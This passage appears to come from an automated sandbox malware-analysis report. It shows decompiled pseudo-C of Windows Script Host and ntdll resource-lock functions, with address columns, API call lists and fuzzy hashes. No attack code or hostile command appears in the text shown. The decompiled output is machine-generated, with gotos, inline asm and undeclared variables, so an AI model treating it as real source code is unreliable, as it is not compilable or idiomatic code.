                                                        0x00b89831
                                                        0x00b89840
                                                        0x00b89839
                                                        0x00b89839
                                                        0x00b89839
                                                        0x00b84193
                                                        0x00b841a4
                                                        0x00b841a4
                                                        0x00b84187
                                                        0x00b84187
                                                        0x00b8418e
                                                        0x00b8418e
                                                        0x00000000
                                                        0x00b84187

                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(00000004,00B82238,00000000,00B82218,00B82218,00000004), ref: 00B84179
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00B82238,000000FF,00000000,00000000,00000000,00000000,UseWINSAFER,TrustPolicy,00000000,00B82218,00B82238), ref: 00B897DB
                                                        • GetLastError.KERNEL32 ref: 00B897E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiQueryValueWide
                                                        • String ID: TrustPolicy$UseWINSAFER
                                                        • API String ID: 2926610503-599510279
                                                        • Opcode ID: 515a314c7ef857315bc6d230b91af42369c3d3ae9ff6ca1012874b01b5518a2e
                                                        • Instruction ID: 67a7b04cfaa3241cd1518b467e7c05eff2fd341560b096de060042d90bfbcf70
                                                        • Opcode Fuzzy Hash: 515a314c7ef857315bc6d230b91af42369c3d3ae9ff6ca1012874b01b5518a2e
                                                        • Instruction Fuzzy Hash: EC214B7690410EBF9F10AF948C84DBE7FBDEB15394B1484AAF522A6060DB358E54DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8EDB1, Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: _errno$_write$_fileno_isatty_lseeki64
                                                        • String ID:
                                                        • API String ID: 3920760039-0
                                                        • Opcode ID: 8207ac199d74a0e49a07cb04085454da8c126d3a565ce807975d61c4bc9a4dac
                                                        • Instruction ID: 2f98114033431b3f3428fd350c3742bae618323bf94fc4545eb57928ebd8472e
                                                        • Opcode Fuzzy Hash: 8207ac199d74a0e49a07cb04085454da8c126d3a565ce807975d61c4bc9a4dac
                                                        • Instruction Fuzzy Hash: 0F41A271401605DFD720AF2DC8899667BE4FF45321B14CAA8F8BA9B6B1D734E941CB10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B81DDB, Relevance: 12.1, APIs: 8, Instructions: 92timewindowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B81DDB(struct HWND__** __ecx, void* __edi, int _a4, signed int _a8, long _a12) {
				int _t25;
				void* _t27;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t35;
				int _t36;
				int _t40;
				int _t42;
				int _t45;
				int _t46;

				_t25 = _a4;
				_t53 = __ecx;
				if(_t25 == 0) {
					PostQuitMessage(0);
					L10:
					return 0;
				}
				_t27 = _t25 - 0xf;
				if(_t27 == 0) {
					__eflags = _a12;
					if(__eflags == 0) {
						E00B863A9(__ecx[2], __eflags, 0x8004fffc);
					}
					return 1;
				}
				_t31 = _t27 - 5;
				if(_t31 == 0) {
					goto L10;
				}
				_t32 = _t31 - 0x6c;
				if(_t32 == 0) {
					 *__ecx =  *__ecx & 0x00000000;
					goto L10;
				}
				_t33 = _t32 - 0x91;
				if(_t33 == 0) {
					E00B8FCE1(__ecx);
					goto L10;
				}
				_t35 = _t33 - 0x2ee;
				if(_t35 == 0) {
					_t36 = __ecx[1];
					__eflags = _t36;
					if(_t36 != 0) {
						_t42 = KillTimer( *__ecx, _t36);
						__eflags = _t42;
						if(_t42 != 0) {
							_t13 =  &(_t53[3]);
							 *_t13 = _t53[3] & 0x00000000;
							__eflags =  *_t13;
						} else {
							_t53[3] = GetLastError();
						}
					}
					__eflags = _a8 - 1;
					if(_a8 >= 1) {
						_t40 = SetTimer( *_t53, 0x19771215, _a8 * 0x3e8, 0);
						_t53[1] = _t40;
						__eflags = _t40;
						if(_t40 != 0) {
							_t19 =  &(_t53[3]);
							 *_t19 = _t53[3] & 0x00000000;
							__eflags =  *_t19;
						} else {
							_t53[3] = GetLastError();
						}
					}
					L7:
					return DefWindowProcA( *_t53, _a4, _a8, _a12);
				}
				if(_t35 == 1) {
					_t45 = __ecx[1];
					__eflags = _t45;
					if(_t45 != 0) {
						_t46 = KillTimer( *__ecx, _t45);
						__eflags = _t46;
						if(_t46 != 0) {
							_t53[1] = _t53[1] & 0x00000000;
							_t53[3] = _t53[3] & 0x00000000;
						} else {
							_t53[3] = GetLastError();
						}
					}
					goto L10;
				}
				goto L7;
			}














                                                        0x00b81de4
                                                        0x00b81de6
                                                        0x00b81de8
                                                        0x00b85b98
                                                        0x00b85b83
                                                        0x00000000
                                                        0x00b85b83
                                                        0x00b81dee
                                                        0x00b81df1
                                                        0x00b8851f
                                                        0x00b88523
                                                        0x00b8852d
                                                        0x00b8852d
                                                        0x00000000
                                                        0x00b88534
                                                        0x00b81df7
                                                        0x00b81dfa
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81e00
                                                        0x00b81e03
                                                        0x00b85b91
                                                        0x00000000
                                                        0x00b85b91
                                                        0x00b81e09
                                                        0x00b81e0e
                                                        0x00b85b8a
                                                        0x00000000
                                                        0x00b85b8a
                                                        0x00b81e14
                                                        0x00b81e19
                                                        0x00b884c2
                                                        0x00b884cc
                                                        0x00b884ce
                                                        0x00b884d3
                                                        0x00b884d9
                                                        0x00b884db
                                                        0x00b884e4
                                                        0x00b884e4
                                                        0x00b884e4
                                                        0x00b884dd
                                                        0x00b884df
                                                        0x00b884df
                                                        0x00b884db
                                                        0x00b884e8
                                                        0x00b884ec
                                                        0x00b88501
                                                        0x00b88507
                                                        0x00b8850a
                                                        0x00b8850c
                                                        0x00b88515
                                                        0x00b88515
                                                        0x00b88515
                                                        0x00b8850e
                                                        0x00b88510
                                                        0x00b88510
                                                        0x00b8850c
                                                        0x00b81e26
                                                        0x00000000
                                                        0x00b81e31
                                                        0x00b81e20
                                                        0x00b85b78
                                                        0x00b85b7b
                                                        0x00b85b7d
                                                        0x00b8849d
                                                        0x00b884a3
                                                        0x00b884a5
                                                        0x00b884b5
                                                        0x00b884b9
                                                        0x00b884a7
                                                        0x00b884ad
                                                        0x00b884ad
                                                        0x00b884a5
                                                        0x00000000
                                                        0x00b85b7d
                                                        0x00000000

                                                        APIs
                                                        • DefWindowProcA.USER32(00000000,?,00000081,?,00000000,?,00B81DCF,00000081,?,?), ref: 00B81E31
                                                        • PostQuitMessage.USER32 ref: 00B85B98
                                                        • KillTimer.USER32 ref: 00B884D3
                                                        • GetLastError.KERNEL32(?,00B81DCF,00000081,?,?), ref: 00B884DD
                                                        • SetTimer.USER32(00000000,19771215,00000001,00000000), ref: 00B88501
                                                        • GetLastError.KERNEL32(?,00B81DCF,00000081,?,?), ref: 00B8850E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorLastTimer$KillMessagePostProcQuitWindow
                                                        • String ID:
                                                        • API String ID: 2265161093-0
                                                        • Opcode ID: f8b4a5f451a9193f3c10ffd0b38b3f3ae74d9bdef0319d23cba45879350d11f9
                                                        • Instruction ID: 6805019e391dfe92c1bba791755795e8078af0dd0cb46e7f2d1ea650c591cba5
                                                        • Opcode Fuzzy Hash: f8b4a5f451a9193f3c10ffd0b38b3f3ae74d9bdef0319d23cba45879350d11f9
                                                        • Instruction Fuzzy Hash: 28317C36100A06DFDB307F2ADC48BA5B7E8EF283A2F54886AE956C2570DB74D900DF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B92D9E, Relevance: 12.1, APIs: 8, Instructions: 64memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$AllocFree$freemalloc
                                                        • String ID:
                                                        • API String ID: 945414394-0
                                                        • Opcode ID: fe2d85a2922837271d9fde6ee1833442a8c4ac38b5fdd82f48e8a4ca7e3de771
                                                        • Instruction ID: ece867dc944ff4b6c7b5545d308d199bbc95c551194bb074a1614d18fd9b2b01
                                                        • Opcode Fuzzy Hash: fe2d85a2922837271d9fde6ee1833442a8c4ac38b5fdd82f48e8a4ca7e3de771
                                                        • Instruction Fuzzy Hash: 5E117375A00B06BBDB21AF3AEC40A4BBBE9EF44760B158579F814D7261DB30D811CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B92D08, Relevance: 12.1, APIs: 8, Instructions: 64memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$AllocFree$freemalloc
                                                        • String ID:
                                                        • API String ID: 945414394-0
                                                        • Opcode ID: 49025a73e2c264e102f248ac16fee5ca78beb8edcbb301dbaa5205a52ff6d594
                                                        • Instruction ID: 896c225446a85b2187c86dec0b2165828727c2e4d2aa1eaf2da2c5f5e18ab5cd
                                                        • Opcode Fuzzy Hash: 49025a73e2c264e102f248ac16fee5ca78beb8edcbb301dbaa5205a52ff6d594
                                                        • Instruction Fuzzy Hash: C4115E36A01706BBDB20AF3ADC40A5BB7E8EF447607108979F854D7260DB30D811CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02310554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 49%
                                                        			E02310554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023b01c0;
									_push(_t144);
									_push(0);
									_t51 = E022CF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02314FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02323F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02323F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0235217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02323F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02313915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023b01c0;
												_push(_t138);
												_push(0);
												_t58 = E022CF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02314FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02323F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02323F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0235217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02323F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02313915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E022F5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E022CF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02313915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E022CF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02313915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E022CF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02313915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E022F5329(_t110, _t138);
																return E022F53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                        0x0231055a
                                                        0x0231055d
                                                        0x02310563
                                                        0x02310566
                                                        0x023105d8
                                                        0x023105e2
                                                        0x023105e5
                                                        0x00000000
                                                        0x023105e7
                                                        0x023105e7
                                                        0x023105ea
                                                        0x023105f3
                                                        0x023105f3
                                                        0x02310568
                                                        0x02310568
                                                        0x02310568
                                                        0x02310569
                                                        0x02310569
                                                        0x02310569
                                                        0x0231056b
                                                        0x00000000
                                                        0x00000000
                                                        0x0233217f
                                                        0x02332183
                                                        0x0233225b
                                                        0x0233225f
                                                        0x02332189
                                                        0x0233218c
                                                        0x0233218f
                                                        0x02332194
                                                        0x02332199
                                                        0x0233219d
                                                        0x023321a0
                                                        0x023321a2
                                                        0x023321ce
                                                        0x023321ce
                                                        0x023321ce
                                                        0x023321d0
                                                        0x023321d6
                                                        0x023321de
                                                        0x023321e2
                                                        0x023321e8
                                                        0x023321e9
                                                        0x023321ec
                                                        0x023321f1
                                                        0x023321f6
                                                        0x00000000
                                                        0x00000000
                                                        0x023321f8
                                                        0x023321fb
                                                        0x02332206
                                                        0x0233220b
                                                        0x0233220c
                                                        0x02332217
                                                        0x02332226
                                                        0x0233222b
                                                        0x0233222c
                                                        0x0233222f
                                                        0x02332232
                                                        0x02332235
                                                        0x02332235
                                                        0x0233223a
                                                        0x0233223f
                                                        0x02332241
                                                        0x02332243
                                                        0x02332248
                                                        0x02332248
                                                        0x0233224d
                                                        0x0233224f
                                                        0x02332262
                                                        0x02332263
                                                        0x02332268
                                                        0x02332269
                                                        0x02332269
                                                        0x02332269
                                                        0x0233226d
                                                        0x00000000
                                                        0x00000000
                                                        0x02332276
                                                        0x02332279
                                                        0x0233227e
                                                        0x02332283
                                                        0x02332287
                                                        0x0233228a
                                                        0x0233228d
                                                        0x0233228f
                                                        0x023322bc
                                                        0x023322bc
                                                        0x023322bc
                                                        0x023322be
                                                        0x023322c4
                                                        0x023322cc
                                                        0x023322d0
                                                        0x023322d6
                                                        0x023322d7
                                                        0x023322da
                                                        0x023322df
                                                        0x023322e4
                                                        0x00000000
                                                        0x00000000
                                                        0x023322e6
                                                        0x023322e9
                                                        0x023322f4
                                                        0x023322f9
                                                        0x023322fa
                                                        0x02332305
                                                        0x02332314
                                                        0x02332319
                                                        0x0233231a
                                                        0x0233231d
                                                        0x02332320
                                                        0x02332323
                                                        0x02332323
                                                        0x02332328
                                                        0x0233232d
                                                        0x0233232f
                                                        0x02332331
                                                        0x02332336
                                                        0x02332336
                                                        0x0233233b
                                                        0x0233233d
                                                        0x02332350
                                                        0x02332351
                                                        0x02332356
                                                        0x02332359
                                                        0x02332359
                                                        0x0233235b
                                                        0x0233235d
                                                        0x022f5367
                                                        0x022f536b
                                                        0x022f5372
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x02332363
                                                        0x02332363
                                                        0x02332369
                                                        0x0233236a
                                                        0x0233236c
                                                        0x02332371
                                                        0x02332373
                                                        0x00000000
                                                        0x02332379
                                                        0x02332379
                                                        0x0233237a
                                                        0x0233237f
                                                        0x0233237f
                                                        0x02332385
                                                        0x02332386
                                                        0x02332389
                                                        0x0233238e
                                                        0x02332390
                                                        0x022f5378
                                                        0x022f537c
                                                        0x02332396
                                                        0x02332396
                                                        0x02332397
                                                        0x0233239c
                                                        0x023323a2
                                                        0x023323a3
                                                        0x023323a6
                                                        0x023323ab
                                                        0x023323ad
                                                        0x00000000
                                                        0x023323b3
                                                        0x023323b3
                                                        0x023323b4
                                                        0x023323b9
                                                        0x023323ba
                                                        0x023323ba
                                                        0x023323bc
                                                        0x023323bf
                                                        0x00000000
                                                        0x00000000
                                                        0x02329153
                                                        0x02329158
                                                        0x0232915a
                                                        0x0232915e
                                                        0x02329160
                                                        0x00000000
                                                        0x02329166
                                                        0x02329166
                                                        0x02329171
                                                        0x02329176
                                                        0x02329176
                                                        0x00000000
                                                        0x02329160
                                                        0x023323c6
                                                        0x023323d7
                                                        0x023323d7
                                                        0x023323ad
                                                        0x02332390
                                                        0x02332373
                                                        0x0233233f
                                                        0x0233233f
                                                        0x00000000
                                                        0x0233233f
                                                        0x02332291
                                                        0x02332291
                                                        0x02332293
                                                        0x02332295
                                                        0x0233229a
                                                        0x023322a1
                                                        0x023322a3
                                                        0x023322a7
                                                        0x023322a9
                                                        0x00000000
                                                        0x00000000
                                                        0x023322ab
                                                        0x023322ad
                                                        0x023322af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x023322af
                                                        0x023322b1
                                                        0x023322b4
                                                        0x023322b4
                                                        0x023322b6
                                                        0x022f53be
                                                        0x022f53be
                                                        0x022f53be
                                                        0x022f53c0
                                                        0x00000000
                                                        0x00000000
                                                        0x022f53cb
                                                        0x022f53ce
                                                        0x022f53d0
                                                        0x022f53d4
                                                        0x022f53d6
                                                        0x00000000
                                                        0x022f53d8
                                                        0x022f53e3
                                                        0x022f53ea
                                                        0x022f53ea
                                                        0x00000000
                                                        0x022f53d6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x023322b6
                                                        0x00000000
                                                        0x0233228f
                                                        0x02332349
                                                        0x0233234d
                                                        0x02332251
                                                        0x02332251
                                                        0x00000000
                                                        0x02332251
                                                        0x023321a4
                                                        0x023321a4
                                                        0x023321a6
                                                        0x023321a8
                                                        0x023321ac
                                                        0x023321b6
                                                        0x023321b8
                                                        0x023321bc
                                                        0x023321be
                                                        0x00000000
                                                        0x00000000
                                                        0x023321c0
                                                        0x023321c2
                                                        0x023321c4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x023321c4
                                                        0x023321c6
                                                        0x023321c6
                                                        0x023321c8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x023321c8
                                                        0x023321a2
                                                        0x00000000
                                                        0x02332183
                                                        0x0231057b
                                                        0x0231057d
                                                        0x02310581
                                                        0x02310583
                                                        0x02332178
                                                        0x00000000
                                                        0x02310589
                                                        0x0231058f
                                                        0x0231058f
                                                        0x02310583
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02332206
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-4236105082
                                                        • Opcode ID: 2a2c8082897d0f5b1e2c738def6be0aa7cc4c6f28f8047bf5d5ac8aca22e6d47
                                                        • Instruction ID: 04c4a6c6eca4db8565af43762eff299516e833653a4f632d4ab8fa3cfb127409
                                                        • Opcode Fuzzy Hash: 2a2c8082897d0f5b1e2c738def6be0aa7cc4c6f28f8047bf5d5ac8aca22e6d47
                                                        • Instruction Fuzzy Hash: F3514B717103116FEB29CE18DC81FA733AAAF84720F218269FD55DB285DA71ED42CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B86481, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E00B86481(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				void* _v28;
				char* _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _v52;
				long _v56;
				intOrPtr _v72;
				signed int _v76;
				intOrPtr _v80;
				char _v84;
				void* _t68;
				signed int _t70;
				intOrPtr* _t77;
				intOrPtr* _t81;
				intOrPtr* _t83;
				signed int _t84;
				signed int _t87;
				signed int _t92;
				intOrPtr _t95;
				long _t103;
				intOrPtr* _t122;
				signed int _t123;
				signed int _t125;
				intOrPtr* _t127;

				_t122 = _a8;
				_v16 = 0;
				_v20 = 0;
				_v8 = 0;
				_t68 =  *((intOrPtr*)( *_t122 + 0xc))(_t122,  &_v84);
				if(_t68 < 0) {
					return _t68;
				}
				_t125 = _a4;
				if(E00B86529( *((intOrPtr*)(_t125 + 0x2c))) == 0) {
					_t70 = 0x80004005;
					L7:
					return _t70;
				}
				_t103 = _v56;
				if(_t103 == 0x8004fffc) {
					__eflags =  *(_t125 + 0x51);
					if( *(_t125 + 0x51) == 0) {
						 *(_t125 + 0x51) = 1;
						_t123 = E00B90A12(_t125);
						__eflags = _t123;
						if(_t123 < 0) {
							L5:
							_t127 = __imp__#6;
							 *_t127(_v80);
							 *_t127(_v76);
							 *_t127(_v72);
							 *_t127(_v8);
							 *_t127(_v20);
							_t77 = _v16;
							if(_t77 != 0) {
								 *((intOrPtr*)( *_t77 + 8))(_t77);
							}
							_t70 = _t123;
							goto L7;
						}
						_t123 = E00B90A52(_t125, 0,  &_v16);
						__eflags = _t123;
						if(_t123 < 0) {
							goto L5;
						}
						_t81 = _v16;
						_v28 = 0;
						_v32 = L"WScript_OnScriptTerminate";
						_t123 =  *((intOrPtr*)( *_t81 + 0x14))(_t81, 0xb81804,  &_v32, 1, 0x400,  &_v28);
						__eflags = _t123;
						if(_t123 < 0) {
							__eflags = _t123 - 0x80020006;
							if(_t123 == 0x80020006) {
								L4:
								_t123 = 0;
								goto L5;
							}
							goto L5;
						}
						_t83 = _v16;
						_v52 = 0;
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_t84 =  *((intOrPtr*)( *_t83 + 0x18))(_t83, _v28, 0xb81804, 0x400, 1,  &_v52, 0, 0, 0);
						_t123 = _t84;
						__eflags = _t123;
						if(_t123 >= 0) {
							goto L4;
						}
						goto L5;
					}
					goto L4;
				}
				if(_t103 != 0x8004fffd) {
					__eflags = _t103 - 0x8004fffe;
					if(_t103 == 0x8004fffe) {
						_t123 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0x2c)))) + 0x20))();
						goto L5;
					}
					_t87 = _v76;
					_a4 = _t87;
					__eflags = _t87;
					if(_t87 == 0) {
						L19:
						_t123 = E00B8F3F0(_t103,  &_v20);
						__eflags = _t123;
						if(_t123 < 0) {
							goto L5;
						}
						_t122 = _a8;
						_a4 = _v20;
						L21:
						_t92 =  *((intOrPtr*)( *_t122 + 0x10))(_t122,  &_v36,  &_v12,  &_v24);
						__eflags = _t92;
						if(_t92 < 0) {
							_t29 =  &_v24;
							 *_t29 = _v24 | 0xffffffff;
							__eflags =  *_t29;
							_v12 = 0;
						} else {
							 *((intOrPtr*)( *_t122 + 0x14))(_t122,  &_v8);
						}
						__eflags = _v8;
						if(__eflags == 0) {
							_v8 = E00B9220B( *((intOrPtr*)(_t125 + 0x40)), __eflags, _v12);
						}
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0x2c)))) + 0x14))(_v12, _v24 + 1, _v80, _a4, _v8, _v56, 0);
						_t95 =  *((intOrPtr*)(_t125 + 0x2c));
						__eflags =  *(_t95 + 0x23);
